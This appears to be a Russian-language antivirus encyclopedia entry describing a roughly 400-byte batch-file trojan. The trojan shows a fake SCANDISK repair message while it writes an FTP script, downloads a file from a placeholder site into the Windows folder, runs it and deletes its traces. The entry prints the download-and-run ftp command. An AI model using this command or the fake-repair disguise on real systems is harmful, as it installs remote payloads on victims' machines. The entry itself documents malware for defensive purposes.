Класс | Trojan |
Платформа | BAT |
Описание |
Technical DetailsТроянская программа. Является пакетным файлом DOS. Размер троянца — около 400 байт. PayloadПри запуске троянской программы появляется окно консоли с сообщением: MS-DOS SCANDISK
found 27,4951 lost bytes fixing error(s)… lost cluster(s) fixed Троянец создает файл с именем C:$.tmp, который содержит сценарий работы для утилиты FTP, после чего запускает эту утилиту с параметрами: ftp -v -i -n -s:c:$.tmp <адрес_сайта для загрузки файла> c:$$.tmp
После этого в папку %WinDir% скачивается файл, имя которого указано в сценарии работы и запускается. После этого троян удаляет файлы: C:$.tmp
c:$$.tmp И завершает свою работу. Removal instructions
|
Узнай статистику распространения угроз в твоем регионе |